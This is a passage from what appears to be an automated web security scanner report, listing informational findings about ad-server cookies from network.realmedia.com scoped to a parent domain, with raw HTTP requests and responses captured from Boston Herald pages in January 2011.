Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:10:00 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.106. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:02:19 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:53:22 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.107. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:18 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3622
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:22:21 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.108. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O4016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:06:27 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1428
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:57:29 GMT;path=/

document.write ('<iframe src="http://view.atdmt.com/MDS/iview/289553367/direct/01/857611358?click=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/857611358/
...[SNIP]...

10.109. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:35:25 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1428
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:26:28 GMT;path=/

document.write ('<iframe src="http://view.atdmt.com/MDS/iview/289553367/direct/01/219928446?click=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bostonherald/ros/728x90/jx/ss/a/L31/219928446/
...[SNIP]...

10.110. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O4016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:10:43 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:01:46 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.111. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:23:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3621
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:14:07 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.112. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:14:51 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3622
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:05:53 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.113. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:36 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PjBpw710IxS|710M5V|710M5b|710M5d|710M5i|710M5l|710M5p|710M5x|710M62|710M69|71012Mr|O1016NX|7A016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2979
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 06:22:37 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...

10.114. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O1012Mr|O3016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:07 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:09 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.115. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:22 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:22:24 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.116. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:27:15 GMT
Server: Apache/2.0.52 (Red Hat)
